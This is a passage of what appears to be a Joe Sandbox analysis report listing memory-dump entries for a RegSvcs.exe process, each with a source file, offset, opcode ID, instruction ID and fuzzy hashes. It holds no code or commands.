                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0920db1d64c1c6f5fa78e6b07da271ad8abcfcf4b54f3f44bfb899a93983321d
                          • Instruction ID: 4f14f27dc20d74844cb5314f89fc4fbc1bdd5f18f5a19c9bf82c10d1aa1a02f6
                          • Opcode Fuzzy Hash: 0920db1d64c1c6f5fa78e6b07da271ad8abcfcf4b54f3f44bfb899a93983321d
                          • Instruction Fuzzy Hash: DB5194B0B102149BFF74AA68D99477E2E6EE789310F20443AE80BD73D4C97DCC518791
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9e5a616e9a43ee4a6f414b8b35426aa8b90c6ecc23defe473f7dcc672ceb502a
                          • Instruction ID: cf51f8869e310e74cab50e5154c61ca17b2913f32c10f96ea5cb0f056a61baff
                          • Opcode Fuzzy Hash: 9e5a616e9a43ee4a6f414b8b35426aa8b90c6ecc23defe473f7dcc672ceb502a
                          • Instruction Fuzzy Hash: 48517271B001058FEB54EF79D960B6E7BF2EF88700F549469C40AEB395DB399C419BA0
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b31a80cac4ac2030d562a69dad17e91093128e2aa49c5cdeb2671ce6c8becd7
                          • Instruction ID: 67efc1b50cca28c1fbd344de8ae40d36767432e36f072ab7baa14ead70b010a9
                          • Opcode Fuzzy Hash: 5b31a80cac4ac2030d562a69dad17e91093128e2aa49c5cdeb2671ce6c8becd7
                          • Instruction Fuzzy Hash: 06515E70F102089FEB549FA5C914BAEBBF7EF88700F24C569E106AB394DA759C018B90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4f12ac462409d98d9c46065aa4864de4112c4f31878eb7926de831888345a80
                          • Instruction ID: 0349c1ab4bbc45d8f836e10a144494f54aaabf55261d86154d04788668bdfea1
                          • Opcode Fuzzy Hash: b4f12ac462409d98d9c46065aa4864de4112c4f31878eb7926de831888345a80
                          • Instruction Fuzzy Hash: E74184B6E102458FEF708E69C58077EBFA2EB45314F10D8A9D45ADBAC1C634D841DF91
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6982cff2ab10e66ae1391705093ed51024876241f32eb1d5561cffecc0945b49
                          • Instruction ID: 02610bab930dba474acbd0b77824fcaa454f34df724faab5abe6692fc2244b58
                          • Opcode Fuzzy Hash: 6982cff2ab10e66ae1391705093ed51024876241f32eb1d5561cffecc0945b49
                          • Instruction Fuzzy Hash: 7A4144B6E006098FEF70CE99D980BAFFFB2EB44210F105965D215D7650D730E8458F90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4b2919e7f895b7a7382bfac9ff97e9e3de043b4e74e9149879dc1f3d80f4f23
                          • Instruction ID: c5434f08248c588dc7a81ccfcd0c5fe00fe172a0a9332b8078843f0f125a5d91
                          • Opcode Fuzzy Hash: a4b2919e7f895b7a7382bfac9ff97e9e3de043b4e74e9149879dc1f3d80f4f23
                          • Instruction Fuzzy Hash: 60417CB0E006099FEB64DFA5D49466EBFB6FF85340F208969D405EB280DB75D942CB81
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a5773de65aa62d67d2365cf5f3010241d045f932c06b5a9cc1e5a375f8ab9df
                          • Instruction ID: 7065bf2ebffceaec24c3b4f9e8e3ce8ca3d110875e6d403fb1025a833a5137e9
                          • Opcode Fuzzy Hash: 7a5773de65aa62d67d2365cf5f3010241d045f932c06b5a9cc1e5a375f8ab9df
                          • Instruction Fuzzy Hash: 08418F70E006099FEB64DFA5D89469EBFB2FF85300F148969D401EB280DB74D842CB51
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c61cbf25c3963f3227f4518767f62fb6cc264c39540ed451b76b8ba0e7252ca5
                          • Instruction ID: 1fe1889552fb963d2e0797ed1720597b530e42983415e862f524e9398ecc97f5
                          • Opcode Fuzzy Hash: c61cbf25c3963f3227f4518767f62fb6cc264c39540ed451b76b8ba0e7252ca5
                          • Instruction Fuzzy Hash: 15310131B002058FEB689B75D55866E3FF7EB89710B5488A8D402EB380DE39DD4ACB90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2b3ea34296703aaeaafd1d03bad33fdc082cda7df17a75980601917cf980751
                          • Instruction ID: d7b8d38d65ccf57aa59eeaef6c8dc7844805cad7aed6b3cf377f56dc30215bf5
                          • Opcode Fuzzy Hash: f2b3ea34296703aaeaafd1d03bad33fdc082cda7df17a75980601917cf980751
                          • Instruction Fuzzy Hash: 0C31F271F002058FEB689B75D55866E3FE3EB88300B2088A8D402EB380DE39CD46CB91
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8da2a09cb0a6090013c794bd7168b2bc0c73f2aa887e263cce9474ff0cc70c6f
                          • Instruction ID: 23906952c2a8099d58aceded25f9e7f3267960245668cdbe9ff1778f06cc37b8
                          • Opcode Fuzzy Hash: 8da2a09cb0a6090013c794bd7168b2bc0c73f2aa887e263cce9474ff0cc70c6f
                          • Instruction Fuzzy Hash: 2C31A770E103099FDB25DFA4C99069EBFB2EF84300F208969E505FB290DB70E9468B90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08111320480a70551f0dc73c930ffc9de1c370898f3a302f8f2db6e1c80de376
                          • Instruction ID: f174090ba60e2924b83204087f1368b6f0275dd5fba9b4305fa17a7b3b4db06f
                          • Opcode Fuzzy Hash: 08111320480a70551f0dc73c930ffc9de1c370898f3a302f8f2db6e1c80de376
                          • Instruction Fuzzy Hash: AA317E71E102199FDB15CFA4C898A9EBBF2FF89700F108969E906E7390DB71AD45CB50
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 407a3f32f3267ae75eaed2874ba828399a067a6bcba6e14363a1dc77ce44267a
                          • Instruction ID: 1be7441c97bd5e53da1422b7307f7e0d1fa33e182420647d06c77157a557c1d3
                          • Opcode Fuzzy Hash: 407a3f32f3267ae75eaed2874ba828399a067a6bcba6e14363a1dc77ce44267a
                          • Instruction Fuzzy Hash: 94318071E102199BDB59CFA4C89869EBFF2FF89300F108969E906E7390DB71AD45CB50
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2a63ccc592b4fa9780c011da32ab69178a1397464a92d90be2d08e807f69a8b
                          • Instruction ID: 7b5703d3397d2f6fb050278307cb9207317aa509153f2e36aa0dc6d9e6498c89
                          • Opcode Fuzzy Hash: a2a63ccc592b4fa9780c011da32ab69178a1397464a92d90be2d08e807f69a8b
                          • Instruction Fuzzy Hash: 9E315CB5E002159FEB50DF69D980A9EBFF5EB48750F14806AE901EB390E7389C518BA4
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42098de95f91feb9e02d4c57beb81de0fc8d60758853184789c5e5d4c7e07de3
                          • Instruction ID: e06b97e775e30d97abe7d9369c694d66489ebff79ac8563c69a9ccf9fe0b7aaf
                          • Opcode Fuzzy Hash: 42098de95f91feb9e02d4c57beb81de0fc8d60758853184789c5e5d4c7e07de3
                          • Instruction Fuzzy Hash: 6C218B75E002158FEB50DF69D980AAEBFF5EB48750F108079E905EB390EB38DC418BA4
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2662141537.0000000002E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E2D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2e2d000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 51ac4b650b61b6cd2bf865728a1ca708eb9d827d133b7d0830008b052aedeabf
                          • Instruction ID: 31f1a91f298b53c28b7265cc96739a2c1a229fc235e6498bd7073626cb33fdab
                          • Opcode Fuzzy Hash: 51ac4b650b61b6cd2bf865728a1ca708eb9d827d133b7d0830008b052aedeabf
                          • Instruction Fuzzy Hash: 32210771544344DFDB14DF10CDC0F26BB66FB88318F24C56DEA4A4B292C736D84ACA62
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: febcc993aa2855db3a6ae0d1c5fb04cf11fc4137e39c7be0392796f1969bf436
                          • Instruction ID: 4d4a2146249cb71bee9c984d03bb9339e21518146412e7d5f5fcbe589b32fbee
                          • Opcode Fuzzy Hash: febcc993aa2855db3a6ae0d1c5fb04cf11fc4137e39c7be0392796f1969bf436
                          • Instruction Fuzzy Hash: DE210F70F101088BEF44DB69E9506AEBFB2EB84310F2485B8D405EB381EB36AC108B90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 864ce607d9790ccc47d0efc52864bcaeee14e9687a913b64a5841924e4271dc2
                          • Instruction ID: f2c22a89687de8e24153820528b50655497206ffa1f821a49cf17cc45ab842c7
                          • Opcode Fuzzy Hash: 864ce607d9790ccc47d0efc52864bcaeee14e9687a913b64a5841924e4271dc2
                          • Instruction Fuzzy Hash: D4117FB1D1075A9BDB21CFA9C45069EBFF5FF85340F10496AE805FB280D771A845CB81
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 512675fae62d4c70a0c24fcdb7de0e9c1bb1522008ffcd0744db0ac53542e46c
                          • Instruction ID: 66aa55a21205e01f18c01998e4ac1445cebeef5698e4a8963a3b6d57b1a1cb75
                          • Opcode Fuzzy Hash: 512675fae62d4c70a0c24fcdb7de0e9c1bb1522008ffcd0744db0ac53542e46c
                          • Instruction Fuzzy Hash: 4211E532B101294FDF549A78DC186AE7BF6EBC9701F04857AD806E7380DE25DC0147E0
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3e46eaab67a6517fac311d9b2303bd0480b1edee5a8cd9fda0608baf8ca1e7b
                          • Instruction ID: f8462c08a25e905499d04846c89839f5495de04e63beccc0b8ddcbf06334da21
                          • Opcode Fuzzy Hash: a3e46eaab67a6517fac311d9b2303bd0480b1edee5a8cd9fda0608baf8ca1e7b
                          • Instruction Fuzzy Hash: A501D4B5B102104FEB6595ACA81172BBFE6DBCA720F10947DE20ACB392EE65DC024391
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 39d597ea85614a7f8de93da29d0c902bb06eadfbaeacc0bc4bb80dc2b9982293
                          • Instruction ID: 4fb7bb4f54272134b629eb94cde8451a04bb0966dd7446fbc6a32c65086176f5
                          • Opcode Fuzzy Hash: 39d597ea85614a7f8de93da29d0c902bb06eadfbaeacc0bc4bb80dc2b9982293
                          • Instruction Fuzzy Hash: 8E012435B002004FEB65DA68DA5075E7FE2EB89700F1088BEE00ADB392EF34DC028780
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aabeaa335c435ea2d161584543522edc8b1c3769831bd947f71022c407f910f2
                          • Instruction ID: 866ed0f463ccdf553397bf837e3f4c6d6da0f880f1aeb77a4c3123afe4fa6906
                          • Opcode Fuzzy Hash: aabeaa335c435ea2d161584543522edc8b1c3769831bd947f71022c407f910f2
                          • Instruction Fuzzy Hash: CE21EDB5900219AFDB00CF9AD984A8EFBB4FB49310F10812AE918B7240D374A944CBA4
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: